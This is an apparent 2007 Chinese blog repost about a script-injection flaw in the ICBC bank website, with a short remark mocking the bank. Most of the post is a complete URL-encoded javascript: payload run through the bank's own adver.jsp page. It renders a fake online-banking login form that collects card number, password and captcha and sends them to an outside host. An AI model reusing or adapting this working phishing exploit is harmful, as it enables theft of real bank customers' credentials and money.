且行且远 » Blog Archive » 工行的低级漏洞(zz from cnBeta)
且行且远
分类: 编程菜园 由 ssfighter 于 2007年1月4日 发表

工行虽然对hotspot的漏洞做了屏蔽,但是漏洞没有吗?
不,漏洞依然存在,虽然不在出现工行页面,但是由于使用的是工行的官方页面,所以只需要构造一个页面用来伪装工行页面,该页面仍然可以钓鱼,贴图如下:



模拟钓鱼地址:模拟钓鱼地址

链接代码如下:

http://www.icbc.com.cn/click/adver/adver.jsp?para=%6A%61%76%61%73%63%72%69%70%74%3A%73%28%29%3B%66%75%6E%63%74%69%6F%6E%20%73%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%74%69%74%6C%65%3E%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0%D0%C2%D2%BB%B4%FA%CD%F8%C9%CF%D2%F8%D0%D0%3C%2F%74%69%74%6C%65%3E%3C%64%69%76%20%61%6C%69%67%6E%253Dcenter%3E%3Cform%20name%253Df%20action%253Dhttp%3A%2F%2Fwww%2E126%2Ecom%3E%3Ctable%20border%253D0%20width%253D400%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Cb%3E%3Cfont%20color%253D%2523FF0000%3E%B8%F6%C8%CB%CD%F8%C9%CF%D2%F8%D0%D0%D3%C3%BB%A7%B5%C7%C2%BC%3C%2Ffont%3E%3C%2Fb%3E%3Cp%20align%253Dcenter%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D7%A2%B2%E1%BF%A8%BA%2F%B5%C7%C2%BCID%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dtext%20name%253Da%20size%253D19%20maxlength%253D19%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%B5%C7%C2%BC%C3%DC%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Db%20size%253D20%20maxlength%253D20%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D3%D2%B2%E0%CF%D4%CA%BE%B5%C4%D1%E9%D6%A4%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Dc%20size%253D4%20maxlength%253D4%3E%2526nbsp%3B%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fverifyimage%2Ejsp%3FrandomKey%253D1167791351382113206%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fagree%2Egif%20border%253D0%3E%3C%2Fa%3E%2526nbsp%3B%2526nbsp%3B%2526nbsp%3B%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fdisagree%2Egif%20border%253D0%3E%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3C%2Fform%3E%3C%2Fdiv%3E%27%29%29%7D%2F%2F

呵呵,这种低级漏洞,工行的网站啊……让钓鱼成为可能



发表评论

昵称:  (必须)
邮件:  (必须)
网址: 
评论: